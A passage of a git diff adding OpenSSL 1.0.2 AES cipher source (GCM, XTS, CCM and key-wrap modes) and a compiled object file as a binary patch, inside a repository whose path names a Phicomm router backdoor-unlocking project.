+        if (gctx->iv_gen == 0 || gctx->key_set == 0 || c->encrypt)
+            return 0;
+        memcpy(gctx->iv + gctx->ivlen - arg, ptr, arg);
+        CRYPTO_gcm128_setiv(&gctx->gcm, gctx->iv, gctx->ivlen);
+        gctx->iv_set = 1;
+        return 1;
+
+    case EVP_CTRL_AEAD_TLS1_AAD:
+        /* Save the AAD for later use */
+        if (arg != 13)
+            return 0;
+        memcpy(c->buf, ptr, arg);
+        gctx->tls_aad_len = arg;
+        {
+            unsigned int len = c->buf[arg - 2] << 8 | c->buf[arg - 1];
+            /* Correct length for explicit IV */
+            len -= EVP_GCM_TLS_EXPLICIT_IV_LEN;
+            /* If decrypting correct for tag too */
+            if (!c->encrypt)
+                len -= EVP_GCM_TLS_TAG_LEN;
+            c->buf[arg - 2] = len >> 8;
+            c->buf[arg - 1] = len & 0xff;
+        }
+        /* Extra padding: tag appended to record */
+        return EVP_GCM_TLS_TAG_LEN;
+
+    case EVP_CTRL_COPY:
+        {
+            EVP_CIPHER_CTX *out = ptr;
+            EVP_AES_GCM_CTX *gctx_out = out->cipher_data;
+            if (gctx->gcm.key) {
+                if (gctx->gcm.key != &gctx->ks)
+                    return 0;
+                gctx_out->gcm.key = &gctx_out->ks;
+            }
+            if (gctx->iv == c->iv)
+                gctx_out->iv = out->iv;
+            else {
+                gctx_out->iv = OPENSSL_malloc(gctx->ivlen);
+                if (!gctx_out->iv)
+                    return 0;
+                memcpy(gctx_out->iv, gctx->iv, gctx->ivlen);
+            }
+            return 1;
+        }
+
+    default:
+        return -1;
+
+    }
+}
+
+static int aes_gcm_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc)
+{
+    EVP_AES_GCM_CTX *gctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key) {
+        do {
+# ifdef HWAES_CAPABLE
+            if (HWAES_CAPABLE) {
+                HWAES_set_encrypt_key(key, ctx->key_len * 8, &gctx->ks.ks);
+                CRYPTO_gcm128_init(&gctx->gcm, &gctx->ks,
+                                   (block128_f) HWAES_encrypt);
+#  ifdef HWAES_ctr32_encrypt_blocks
+                gctx->ctr = (ctr128_f) HWAES_ctr32_encrypt_blocks;
+#  else
+                gctx->ctr = NULL;
+#  endif
+                break;
+            } else
+# endif
+# ifdef BSAES_CAPABLE
+            if (BSAES_CAPABLE) {
+                AES_set_encrypt_key(key, ctx->key_len * 8, &gctx->ks.ks);
+                CRYPTO_gcm128_init(&gctx->gcm, &gctx->ks,
+                                   (block128_f) AES_encrypt);
+                gctx->ctr = (ctr128_f) bsaes_ctr32_encrypt_blocks;
+                break;
+            } else
+# endif
+# ifdef VPAES_CAPABLE
+            if (VPAES_CAPABLE) {
+                vpaes_set_encrypt_key(key, ctx->key_len * 8, &gctx->ks.ks);
+                CRYPTO_gcm128_init(&gctx->gcm, &gctx->ks,
+                                   (block128_f) vpaes_encrypt);
+                gctx->ctr = NULL;
+                break;
+            } else
+# endif
+                (void)0;        /* terminate potentially open 'else' */
+
+            AES_set_encrypt_key(key, ctx->key_len * 8, &gctx->ks.ks);
+            CRYPTO_gcm128_init(&gctx->gcm, &gctx->ks,
+                               (block128_f) AES_encrypt);
+# ifdef AES_CTR_ASM
+            gctx->ctr = (ctr128_f) AES_ctr32_encrypt;
+# else
+            gctx->ctr = NULL;
+# endif
+        } while (0);
+
+        /*
+         * If we have an iv can set it directly, otherwise use saved IV.
+         */
+        if (iv == NULL && gctx->iv_set)
+            iv = gctx->iv;
+        if (iv) {
+            CRYPTO_gcm128_setiv(&gctx->gcm, iv, gctx->ivlen);
+            gctx->iv_set = 1;
+        }
+        gctx->key_set = 1;
+    } else {
+        /* If key set use IV, otherwise copy */
+        if (gctx->key_set)
+            CRYPTO_gcm128_setiv(&gctx->gcm, iv, gctx->ivlen);
+        else
+            memcpy(gctx->iv, iv, gctx->ivlen);
+        gctx->iv_set = 1;
+        gctx->iv_gen = 0;
+    }
+    return 1;
+}
+
+/*
+ * Handle TLS GCM packet format. This consists of the last portion of the IV
+ * followed by the payload and finally the tag. On encrypt generate IV,
+ * encrypt payload and write the tag. On verify retrieve IV, decrypt payload
+ * and verify tag.
+ */
+
+static int aes_gcm_tls_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len)
+{
+    EVP_AES_GCM_CTX *gctx = ctx->cipher_data;
+    int rv = -1;
+    /* Encrypt/decrypt must be performed in place */
+    if (out != in
+        || len < (EVP_GCM_TLS_EXPLICIT_IV_LEN + EVP_GCM_TLS_TAG_LEN))
+        return -1;
+    /*
+     * Set IV from start of buffer or generate IV and write to start of
+     * buffer.
+     */
+    if (EVP_CIPHER_CTX_ctrl(ctx, ctx->encrypt ?
+                            EVP_CTRL_GCM_IV_GEN : EVP_CTRL_GCM_SET_IV_INV,
+                            EVP_GCM_TLS_EXPLICIT_IV_LEN, out) <= 0)
+        goto err;
+    /* Use saved AAD */
+    if (CRYPTO_gcm128_aad(&gctx->gcm, ctx->buf, gctx->tls_aad_len))
+        goto err;
+    /* Fix buffer and length to point to payload */
+    in += EVP_GCM_TLS_EXPLICIT_IV_LEN;
+    out += EVP_GCM_TLS_EXPLICIT_IV_LEN;
+    len -= EVP_GCM_TLS_EXPLICIT_IV_LEN + EVP_GCM_TLS_TAG_LEN;
+    if (ctx->encrypt) {
+        /* Encrypt payload */
+        if (gctx->ctr) {
+            size_t bulk = 0;
+# if defined(AES_GCM_ASM)
+            if (len >= 32 && AES_GCM_ASM(gctx)) {
+                if (CRYPTO_gcm128_encrypt(&gctx->gcm, NULL, NULL, 0))
+                    return -1;
+
+                bulk = AES_gcm_encrypt(in, out, len,
+                                       gctx->gcm.key,
+                                       gctx->gcm.Yi.c, gctx->gcm.Xi.u);
+                gctx->gcm.len.u[1] += bulk;
+            }
+# endif
+            if (CRYPTO_gcm128_encrypt_ctr32(&gctx->gcm,
+                                            in + bulk,
+                                            out + bulk,
+                                            len - bulk, gctx->ctr))
+                goto err;
+        } else {
+            size_t bulk = 0;
+# if defined(AES_GCM_ASM2)
+            if (len >= 32 && AES_GCM_ASM2(gctx)) {
+                if (CRYPTO_gcm128_encrypt(&gctx->gcm, NULL, NULL, 0))
+                    return -1;
+
+                bulk = AES_gcm_encrypt(in, out, len,
+                                       gctx->gcm.key,
+                                       gctx->gcm.Yi.c, gctx->gcm.Xi.u);
+                gctx->gcm.len.u[1] += bulk;
+            }
+# endif
+            if (CRYPTO_gcm128_encrypt(&gctx->gcm,
+                                      in + bulk, out + bulk, len - bulk))
+                goto err;
+        }
+        out += len;
+        /* Finally write tag */
+        CRYPTO_gcm128_tag(&gctx->gcm, out, EVP_GCM_TLS_TAG_LEN);
+        rv = len + EVP_GCM_TLS_EXPLICIT_IV_LEN + EVP_GCM_TLS_TAG_LEN;
+    } else {
+        /* Decrypt */
+        if (gctx->ctr) {
+            size_t bulk = 0;
+# if defined(AES_GCM_ASM)
+            if (len >= 16 && AES_GCM_ASM(gctx)) {
+                if (CRYPTO_gcm128_decrypt(&gctx->gcm, NULL, NULL, 0))
+                    return -1;
+
+                bulk = AES_gcm_decrypt(in, out, len,
+                                       gctx->gcm.key,
+                                       gctx->gcm.Yi.c, gctx->gcm.Xi.u);
+                gctx->gcm.len.u[1] += bulk;
+            }
+# endif
+            if (CRYPTO_gcm128_decrypt_ctr32(&gctx->gcm,
+                                            in + bulk,
+                                            out + bulk,
+                                            len - bulk, gctx->ctr))
+                goto err;
+        } else {
+            size_t bulk = 0;
+# if defined(AES_GCM_ASM2)
+            if (len >= 16 && AES_GCM_ASM2(gctx)) {
+                if (CRYPTO_gcm128_decrypt(&gctx->gcm, NULL, NULL, 0))
+                    return -1;
+
+                bulk = AES_gcm_decrypt(in, out, len,
+                                       gctx->gcm.key,
+                                       gctx->gcm.Yi.c, gctx->gcm.Xi.u);
+                gctx->gcm.len.u[1] += bulk;
+            }
+# endif
+            if (CRYPTO_gcm128_decrypt(&gctx->gcm,
+                                      in + bulk, out + bulk, len - bulk))
+                goto err;
+        }
+        /* Retrieve tag */
+        CRYPTO_gcm128_tag(&gctx->gcm, ctx->buf, EVP_GCM_TLS_TAG_LEN);
+        /* If tag mismatch wipe buffer */
+        if (memcmp(ctx->buf, in + len, EVP_GCM_TLS_TAG_LEN)) {
+            OPENSSL_cleanse(out, len);
+            goto err;
+        }
+        rv = len;
+    }
+
+ err:
+    gctx->iv_set = 0;
+    gctx->tls_aad_len = -1;
+    return rv;
+}
+
+static int aes_gcm_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    EVP_AES_GCM_CTX *gctx = ctx->cipher_data;
+    /* If not set up, return error */
+    if (!gctx->key_set)
+        return -1;
+
+    if (gctx->tls_aad_len >= 0)
+        return aes_gcm_tls_cipher(ctx, out, in, len);
+
+    if (!gctx->iv_set)
+        return -1;
+    if (in) {
+        if (out == NULL) {
+            if (CRYPTO_gcm128_aad(&gctx->gcm, in, len))
+                return -1;
+        } else if (ctx->encrypt) {
+            if (gctx->ctr) {
+                size_t bulk = 0;
+# if defined(AES_GCM_ASM)
+                if (len >= 32 && AES_GCM_ASM(gctx)) {
+                    size_t res = (16 - gctx->gcm.mres) % 16;
+
+                    if (CRYPTO_gcm128_encrypt(&gctx->gcm, in, out, res))
+                        return -1;
+
+                    bulk = AES_gcm_encrypt(in + res,
+                                           out + res, len - res,
+                                           gctx->gcm.key, gctx->gcm.Yi.c,
+                                           gctx->gcm.Xi.u);
+                    gctx->gcm.len.u[1] += bulk;
+                    bulk += res;
+                }
+# endif
+                if (CRYPTO_gcm128_encrypt_ctr32(&gctx->gcm,
+                                                in + bulk,
+                                                out + bulk,
+                                                len - bulk, gctx->ctr))
+                    return -1;
+            } else {
+                size_t bulk = 0;
+# if defined(AES_GCM_ASM2)
+                if (len >= 32 && AES_GCM_ASM2(gctx)) {
+                    size_t res = (16 - gctx->gcm.mres) % 16;
+
+                    if (CRYPTO_gcm128_encrypt(&gctx->gcm, in, out, res))
+                        return -1;
+
+                    bulk = AES_gcm_encrypt(in + res,
+                                           out + res, len - res,
+                                           gctx->gcm.key, gctx->gcm.Yi.c,
+                                           gctx->gcm.Xi.u);
+                    gctx->gcm.len.u[1] += bulk;
+                    bulk += res;
+                }
+# endif
+                if (CRYPTO_gcm128_encrypt(&gctx->gcm,
+                                          in + bulk, out + bulk, len - bulk))
+                    return -1;
+            }
+        } else {
+            if (gctx->ctr) {
+                size_t bulk = 0;
+# if defined(AES_GCM_ASM)
+                if (len >= 16 && AES_GCM_ASM(gctx)) {
+                    size_t res = (16 - gctx->gcm.mres) % 16;
+
+                    if (CRYPTO_gcm128_decrypt(&gctx->gcm, in, out, res))
+                        return -1;
+
+                    bulk = AES_gcm_decrypt(in + res,
+                                           out + res, len - res,
+                                           gctx->gcm.key,
+                                           gctx->gcm.Yi.c, gctx->gcm.Xi.u);
+                    gctx->gcm.len.u[1] += bulk;
+                    bulk += res;
+                }
+# endif
+                if (CRYPTO_gcm128_decrypt_ctr32(&gctx->gcm,
+                                                in + bulk,
+                                                out + bulk,
+                                                len - bulk, gctx->ctr))
+                    return -1;
+            } else {
+                size_t bulk = 0;
+# if defined(AES_GCM_ASM2)
+                if (len >= 16 && AES_GCM_ASM2(gctx)) {
+                    size_t res = (16 - gctx->gcm.mres) % 16;
+
+                    if (CRYPTO_gcm128_decrypt(&gctx->gcm, in, out, res))
+                        return -1;
+
+                    bulk = AES_gcm_decrypt(in + res,
+                                           out + res, len - res,
+                                           gctx->gcm.key,
+                                           gctx->gcm.Yi.c, gctx->gcm.Xi.u);
+                    gctx->gcm.len.u[1] += bulk;
+                    bulk += res;
+                }
+# endif
+                if (CRYPTO_gcm128_decrypt(&gctx->gcm,
+                                          in + bulk, out + bulk, len - bulk))
+                    return -1;
+            }
+        }
+        return len;
+    } else {
+        if (!ctx->encrypt) {
+            if (gctx->taglen < 0)
+                return -1;
+            if (CRYPTO_gcm128_finish(&gctx->gcm, ctx->buf, gctx->taglen) != 0)
+                return -1;
+            gctx->iv_set = 0;
+            return 0;
+        }
+        CRYPTO_gcm128_tag(&gctx->gcm, ctx->buf, 16);
+        gctx->taglen = 16;
+        /* Don't reuse the IV */
+        gctx->iv_set = 0;
+        return 0;
+    }
+
+}
+
+# define CUSTOM_FLAGS    (EVP_CIPH_FLAG_DEFAULT_ASN1 \
+                | EVP_CIPH_CUSTOM_IV | EVP_CIPH_FLAG_CUSTOM_CIPHER \
+                | EVP_CIPH_ALWAYS_CALL_INIT | EVP_CIPH_CTRL_INIT \
+                | EVP_CIPH_CUSTOM_COPY)
+
+BLOCK_CIPHER_custom(NID_aes, 128, 1, 12, gcm, GCM,
+                    EVP_CIPH_FLAG_FIPS | EVP_CIPH_FLAG_AEAD_CIPHER |
+                    CUSTOM_FLAGS)
+    BLOCK_CIPHER_custom(NID_aes, 192, 1, 12, gcm, GCM,
+                    EVP_CIPH_FLAG_FIPS | EVP_CIPH_FLAG_AEAD_CIPHER |
+                    CUSTOM_FLAGS)
+    BLOCK_CIPHER_custom(NID_aes, 256, 1, 12, gcm, GCM,
+                    EVP_CIPH_FLAG_FIPS | EVP_CIPH_FLAG_AEAD_CIPHER |
+                    CUSTOM_FLAGS)
+
+static int aes_xts_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+    EVP_AES_XTS_CTX *xctx = c->cipher_data;
+    if (type == EVP_CTRL_COPY) {
+        EVP_CIPHER_CTX *out = ptr;
+        EVP_AES_XTS_CTX *xctx_out = out->cipher_data;
+        if (xctx->xts.key1) {
+            if (xctx->xts.key1 != &xctx->ks1)
+                return 0;
+            xctx_out->xts.key1 = &xctx_out->ks1;
+        }
+        if (xctx->xts.key2) {
+            if (xctx->xts.key2 != &xctx->ks2)
+                return 0;
+            xctx_out->xts.key2 = &xctx_out->ks2;
+        }
+        return 1;
+    } else if (type != EVP_CTRL_INIT)
+        return -1;
+    /* key1 and key2 are used as an indicator both key and IV are set */
+    xctx->xts.key1 = NULL;
+    xctx->xts.key2 = NULL;
+    return 1;
+}
+
+static int aes_xts_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc)
+{
+    EVP_AES_XTS_CTX *xctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+
+    if (key)
+        do {
+# ifdef AES_XTS_ASM
+            xctx->stream = enc ? AES_xts_encrypt : AES_xts_decrypt;
+# else
+            xctx->stream = NULL;
+# endif
+            /* key_len is two AES keys */
+# ifdef HWAES_CAPABLE
+            if (HWAES_CAPABLE) {
+                if (enc) {
+                    HWAES_set_encrypt_key(key, ctx->key_len * 4,
+                                          &xctx->ks1.ks);
+                    xctx->xts.block1 = (block128_f) HWAES_encrypt;
+                } else {
+                    HWAES_set_decrypt_key(key, ctx->key_len * 4,
+                                          &xctx->ks1.ks);
+                    xctx->xts.block1 = (block128_f) HWAES_decrypt;
+                }
+
+                HWAES_set_encrypt_key(key + ctx->key_len / 2,
+                                      ctx->key_len * 4, &xctx->ks2.ks);
+                xctx->xts.block2 = (block128_f) HWAES_encrypt;
+
+                xctx->xts.key1 = &xctx->ks1;
+                break;
+            } else
+# endif
+# ifdef BSAES_CAPABLE
+            if (BSAES_CAPABLE)
+                xctx->stream = enc ? bsaes_xts_encrypt : bsaes_xts_decrypt;
+            else
+# endif
+# ifdef VPAES_CAPABLE
+            if (VPAES_CAPABLE) {
+                if (enc) {
+                    vpaes_set_encrypt_key(key, ctx->key_len * 4,
+                                          &xctx->ks1.ks);
+                    xctx->xts.block1 = (block128_f) vpaes_encrypt;
+                } else {
+                    vpaes_set_decrypt_key(key, ctx->key_len * 4,
+                                          &xctx->ks1.ks);
+                    xctx->xts.block1 = (block128_f) vpaes_decrypt;
+                }
+
+                vpaes_set_encrypt_key(key + ctx->key_len / 2,
+                                      ctx->key_len * 4, &xctx->ks2.ks);
+                xctx->xts.block2 = (block128_f) vpaes_encrypt;
+
+                xctx->xts.key1 = &xctx->ks1;
+                break;
+            } else
+# endif
+                (void)0;        /* terminate potentially open 'else' */
+
+            if (enc) {
+                AES_set_encrypt_key(key, ctx->key_len * 4, &xctx->ks1.ks);
+                xctx->xts.block1 = (block128_f) AES_encrypt;
+            } else {
+                AES_set_decrypt_key(key, ctx->key_len * 4, &xctx->ks1.ks);
+                xctx->xts.block1 = (block128_f) AES_decrypt;
+            }
+
+            AES_set_encrypt_key(key + ctx->key_len / 2,
+                                ctx->key_len * 4, &xctx->ks2.ks);
+            xctx->xts.block2 = (block128_f) AES_encrypt;
+
+            xctx->xts.key1 = &xctx->ks1;
+        } while (0);
+
+    if (iv) {
+        xctx->xts.key2 = &xctx->ks2;
+        memcpy(ctx->iv, iv, 16);
+    }
+
+    return 1;
+}
+
+static int aes_xts_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    EVP_AES_XTS_CTX *xctx = ctx->cipher_data;
+    if (!xctx->xts.key1 || !xctx->xts.key2)
+        return 0;
+    if (!out || !in || len < AES_BLOCK_SIZE)
+        return 0;
+    if (xctx->stream)
+        (*xctx->stream) (in, out, len,
+                         xctx->xts.key1, xctx->xts.key2, ctx->iv);
+    else if (CRYPTO_xts128_encrypt(&xctx->xts, ctx->iv, in, out, len,
+                                   ctx->encrypt))
+        return 0;
+    return 1;
+}
+
+# define aes_xts_cleanup NULL
+
+# define XTS_FLAGS       (EVP_CIPH_FLAG_DEFAULT_ASN1 | EVP_CIPH_CUSTOM_IV \
+                         | EVP_CIPH_ALWAYS_CALL_INIT | EVP_CIPH_CTRL_INIT \
+                         | EVP_CIPH_CUSTOM_COPY)
+
+BLOCK_CIPHER_custom(NID_aes, 128, 1, 16, xts, XTS,
+                    EVP_CIPH_FLAG_FIPS | XTS_FLAGS)
+    BLOCK_CIPHER_custom(NID_aes, 256, 1, 16, xts, XTS,
+                    EVP_CIPH_FLAG_FIPS | XTS_FLAGS)
+
+static int aes_ccm_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+    EVP_AES_CCM_CTX *cctx = c->cipher_data;
+    switch (type) {
+    case EVP_CTRL_INIT:
+        cctx->key_set = 0;
+        cctx->iv_set = 0;
+        cctx->L = 8;
+        cctx->M = 12;
+        cctx->tag_set = 0;
+        cctx->len_set = 0;
+        return 1;
+
+    case EVP_CTRL_CCM_SET_IVLEN:
+        arg = 15 - arg;
+    case EVP_CTRL_CCM_SET_L:
+        if (arg < 2 || arg > 8)
+            return 0;
+        cctx->L = arg;
+        return 1;
+
+    case EVP_CTRL_CCM_SET_TAG:
+        if ((arg & 1) || arg < 4 || arg > 16)
+            return 0;
+        if ((c->encrypt && ptr) || (!c->encrypt && !ptr))
+            return 0;
+        if (ptr) {
+            cctx->tag_set = 1;
+            memcpy(c->buf, ptr, arg);
+        }
+        cctx->M = arg;
+        return 1;
+
+    case EVP_CTRL_CCM_GET_TAG:
+        if (!c->encrypt || !cctx->tag_set)
+            return 0;
+        if (!CRYPTO_ccm128_tag(&cctx->ccm, ptr, (size_t)arg))
+            return 0;
+        cctx->tag_set = 0;
+        cctx->iv_set = 0;
+        cctx->len_set = 0;
+        return 1;
+
+    case EVP_CTRL_COPY:
+        {
+            EVP_CIPHER_CTX *out = ptr;
+            EVP_AES_CCM_CTX *cctx_out = out->cipher_data;
+            if (cctx->ccm.key) {
+                if (cctx->ccm.key != &cctx->ks)
+                    return 0;
+                cctx_out->ccm.key = &cctx_out->ks;
+            }
+            return 1;
+        }
+
+    default:
+        return -1;
+
+    }
+}
+
+static int aes_ccm_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc)
+{
+    EVP_AES_CCM_CTX *cctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key)
+        do {
+# ifdef HWAES_CAPABLE
+            if (HWAES_CAPABLE) {
+                HWAES_set_encrypt_key(key, ctx->key_len * 8, &cctx->ks.ks);
+
+                CRYPTO_ccm128_init(&cctx->ccm, cctx->M, cctx->L,
+                                   &cctx->ks, (block128_f) HWAES_encrypt);
+                cctx->str = NULL;
+                cctx->key_set = 1;
+                break;
+            } else
+# endif
+# ifdef VPAES_CAPABLE
+            if (VPAES_CAPABLE) {
+                vpaes_set_encrypt_key(key, ctx->key_len * 8, &cctx->ks.ks);
+                CRYPTO_ccm128_init(&cctx->ccm, cctx->M, cctx->L,
+                                   &cctx->ks, (block128_f) vpaes_encrypt);
+                cctx->str = NULL;
+                cctx->key_set = 1;
+                break;
+            }
+# endif
+            AES_set_encrypt_key(key, ctx->key_len * 8, &cctx->ks.ks);
+            CRYPTO_ccm128_init(&cctx->ccm, cctx->M, cctx->L,
+                               &cctx->ks, (block128_f) AES_encrypt);
+            cctx->str = NULL;
+            cctx->key_set = 1;
+        } while (0);
+    if (iv) {
+        memcpy(ctx->iv, iv, 15 - cctx->L);
+        cctx->iv_set = 1;
+    }
+    return 1;
+}
+
+static int aes_ccm_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                          const unsigned char *in, size_t len)
+{
+    EVP_AES_CCM_CTX *cctx = ctx->cipher_data;
+    CCM128_CONTEXT *ccm = &cctx->ccm;
+    /* If not set up, return error */
+    if (!cctx->iv_set && !cctx->key_set)
+        return -1;
+    if (!ctx->encrypt && !cctx->tag_set)
+        return -1;
+    if (!out) {
+        if (!in) {
+            if (CRYPTO_ccm128_setiv(ccm, ctx->iv, 15 - cctx->L, len))
+                return -1;
+            cctx->len_set = 1;
+            return len;
+        }
+        /* If have AAD need message length */
+        if (!cctx->len_set && len)
+            return -1;
+        CRYPTO_ccm128_aad(ccm, in, len);
+        return len;
+    }
+    /* EVP_*Final() doesn't return any data */
+    if (!in)
+        return 0;
+    /* If not set length yet do it */
+    if (!cctx->len_set) {
+        if (CRYPTO_ccm128_setiv(ccm, ctx->iv, 15 - cctx->L, len))
+            return -1;
+        cctx->len_set = 1;
+    }
+    if (ctx->encrypt) {
+        if (cctx->str ? CRYPTO_ccm128_encrypt_ccm64(ccm, in, out, len,
+                                                    cctx->str) :
+            CRYPTO_ccm128_encrypt(ccm, in, out, len))
+            return -1;
+        cctx->tag_set = 1;
+        return len;
+    } else {
+        int rv = -1;
+        if (cctx->str ? !CRYPTO_ccm128_decrypt_ccm64(ccm, in, out, len,
+                                                     cctx->str) :
+            !CRYPTO_ccm128_decrypt(ccm, in, out, len)) {
+            unsigned char tag[16];
+            if (CRYPTO_ccm128_tag(ccm, tag, cctx->M)) {
+                if (!memcmp(tag, ctx->buf, cctx->M))
+                    rv = len;
+            }
+        }
+        if (rv == -1)
+            OPENSSL_cleanse(out, len);
+        cctx->iv_set = 0;
+        cctx->tag_set = 0;
+        cctx->len_set = 0;
+        return rv;
+    }
+
+}
+
+# define aes_ccm_cleanup NULL
+
+BLOCK_CIPHER_custom(NID_aes, 128, 1, 12, ccm, CCM,
+                    EVP_CIPH_FLAG_FIPS | CUSTOM_FLAGS)
+    BLOCK_CIPHER_custom(NID_aes, 192, 1, 12, ccm, CCM,
+                    EVP_CIPH_FLAG_FIPS | CUSTOM_FLAGS)
+    BLOCK_CIPHER_custom(NID_aes, 256, 1, 12, ccm, CCM,
+                    EVP_CIPH_FLAG_FIPS | CUSTOM_FLAGS)
+#endif
+typedef struct {
+    union {
+        double align;
+        AES_KEY ks;
+    } ks;
+    /* Indicates if IV has been set */
+    unsigned char *iv;
+} EVP_AES_WRAP_CTX;
+
+static int aes_wrap_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc)
+{
+    EVP_AES_WRAP_CTX *wctx = ctx->cipher_data;
+    if (!iv && !key)
+        return 1;
+    if (key) {
+        if (ctx->encrypt)
+            AES_set_encrypt_key(key, ctx->key_len * 8, &wctx->ks.ks);
+        else
+            AES_set_decrypt_key(key, ctx->key_len * 8, &wctx->ks.ks);
+        if (!iv)
+            wctx->iv = NULL;
+    }
+    if (iv) {
+        memcpy(ctx->iv, iv, 8);
+        wctx->iv = ctx->iv;
+    }
+    return 1;
+}
+
+static int aes_wrap_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inlen)
+{
+    EVP_AES_WRAP_CTX *wctx = ctx->cipher_data;
+    size_t rv;
+    if (!in)
+        return 0;
+    if (inlen % 8)
+        return -1;
+    if (ctx->encrypt && inlen < 8)
+        return -1;
+    if (!ctx->encrypt && inlen < 16)
+        return -1;
+    if (!out) {
+        if (ctx->encrypt)
+            return inlen + 8;
+        else
+            return inlen - 8;
+    }
+    if (ctx->encrypt)
+        rv = CRYPTO_128_wrap(&wctx->ks.ks, wctx->iv, out, in, inlen,
+                             (block128_f) AES_encrypt);
+    else
+        rv = CRYPTO_128_unwrap(&wctx->ks.ks, wctx->iv, out, in, inlen,
+                               (block128_f) AES_decrypt);
+    return rv ? (int)rv : -1;
+}
+
+#define WRAP_FLAGS      (EVP_CIPH_WRAP_MODE \
+                | EVP_CIPH_CUSTOM_IV | EVP_CIPH_FLAG_CUSTOM_CIPHER \
+                | EVP_CIPH_ALWAYS_CALL_INIT | EVP_CIPH_FLAG_DEFAULT_ASN1)
+
+static const EVP_CIPHER aes_128_wrap = {
+    NID_id_aes128_wrap,
+    8, 16, 8, WRAP_FLAGS,
+    aes_wrap_init_key, aes_wrap_cipher,
+    NULL,
+    sizeof(EVP_AES_WRAP_CTX),
+    NULL, NULL, NULL, NULL
+};
+
+const EVP_CIPHER *EVP_aes_128_wrap(void)
+{
+    return &aes_128_wrap;
+}
+
+static const EVP_CIPHER aes_192_wrap = {
+    NID_id_aes192_wrap,
+    8, 24, 8, WRAP_FLAGS,
+    aes_wrap_init_key, aes_wrap_cipher,
+    NULL,
+    sizeof(EVP_AES_WRAP_CTX),
+    NULL, NULL, NULL, NULL
+};
+
+const EVP_CIPHER *EVP_aes_192_wrap(void)
+{
+    return &aes_192_wrap;
+}
+
+static const EVP_CIPHER aes_256_wrap = {
+    NID_id_aes256_wrap,
+    8, 32, 8, WRAP_FLAGS,
+    aes_wrap_init_key, aes_wrap_cipher,
+    NULL,
+    sizeof(EVP_AES_WRAP_CTX),
+    NULL, NULL, NULL, NULL
+};
+
+const EVP_CIPHER *EVP_aes_256_wrap(void)
+{
+    return &aes_256_wrap;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.o
new file mode 100644
index 0000000000000000000000000000000000000000..fba33108b1107a4d97d1a7ccc587a88a41842417
GIT binary patch
literal 22576
zcmeI44Rlo1wSaGaAfwQk!JjtORHuE>h5}g$QcaYn8S-~V2M7dg<i{io!BF{YG6SKd
zl6o`9^)i4zt#p<8c$HRKp0D-!S`p9&s0J*$5VazuZM2G{BNS0FDv-DLxqDB}9A{XM
zzOdeUYrV6ax%Yf`pMCb(=bU}c+#Fn98LZ08$S^o%7&jXIIi`m3tJ?niGI?8OTx1M0
z-uGPbiT@k^Tm4i0Q>NDXYlNK>3^im2O7|`q6&(IX&|cmauucZ7SB3RL@gD=RF;@g)
z%f4g;GyWR1KJoWG)C;;q>7QEPp0)+6oj%h)!#~r1yT5)HY8G~Nn|a0+nIP;*ZNgr8
z9ArdvPk5Lp-4PyCS=<?~6W0Bb+ADkEp<il2k(<OINB54%Ya({HytnQ~nRve6+}#&F
z8Oak}?N}BQ73^w92}~7Mr!*m8?T1!b&kK8En_cY<#;OZ~_7BlV<D-8J5Aj<&g4S#P
zzL(>d1#Js!fo!xhoO1+~#0SZXG-{gDB5R+x;JBw_7d-Xf8nDiw;{w(zQ-$?mt+4Cc
zMD%3%F1xxpx+iFlLLI_7D7s8<Cf;N2@3ApaybHUf?x3~VfM@ZGWlq?G94Ql_->zzY
z3JV5fCYts`D*DmKL2IX2Ct}M68LY$wa>Du%`eS_bt#GbziU`X@kN7>_?0mmxSXIGv
z*%<1kT{5FIEIbc}fv{e!71pQ1`Y33JWP_^h@@DfpUhvJEu`$o0g~<*Q(WBu@g<WX~
zb60_|vI5rnd^9+IaiFV1-eH;eAQ9akIgqeGt=)VVx@KY>b`SIz^%rzS-{YvKzZZo0
zyIk&9kb?0_-RhK0l&DEj#ObQNQ^#9xi>LdX<Z)X1nlRrj5cVx?C(FO(3twiJd!34d
zv0Lh((ZN`GK~2xyU`e3#=;8_Rcq<Mw`4k>GvSP=ZH^E3-mY*xEU_Q7ZobPk2@PO=X
zw~HO!V}%`r$96d1E9_<Yu0Y1K@y9^_7L*V>{x(+1cz(GrnDJ)#OHd8y%u24sX;|Gf
za72OZJ!i`Oqdwv0ThBu^CD=~z1Q>Tq+iYQHUsZs1Srz%N;!eA~E@<C}69@9yA_iaM
zqx-`b`X@Uk#fLg>aB{cT+aO?-*9o|~W{YbaU14WJf$?6)cxktF9D@(e9<w*sbI<53
zsN+=;yA&!n0#<Lp+ABiYcZ-aDH}-WyfD*Cg1u&&>U|_P#h6-!jN*MoL=7aE!9c!6u
z;cg4wf=hic3)Vrt=Oy@x9$lVO+}X1aZq3u)<wLB^DBANI_$rmR-#sd9sV-o476ePX
z$mXqfHuxg;b*$3*yX;s{i`9x~XXL5)=2&H)+3Q*Ih`HQrM1Bl~ORS!tbvS5sy}!}g
zjF$CGf-gtRb59%ChN7O11$eg&1q{#1Ml?CLM3#N0=L&%4>AuLNB4nePWErS^e`9>K
zc{<Cpx(Eu`vbn>Ln7uik)mNehrv=gg5qkFhjefHYtnze8Kj7Hyc^1CyC#2FWrx{k)
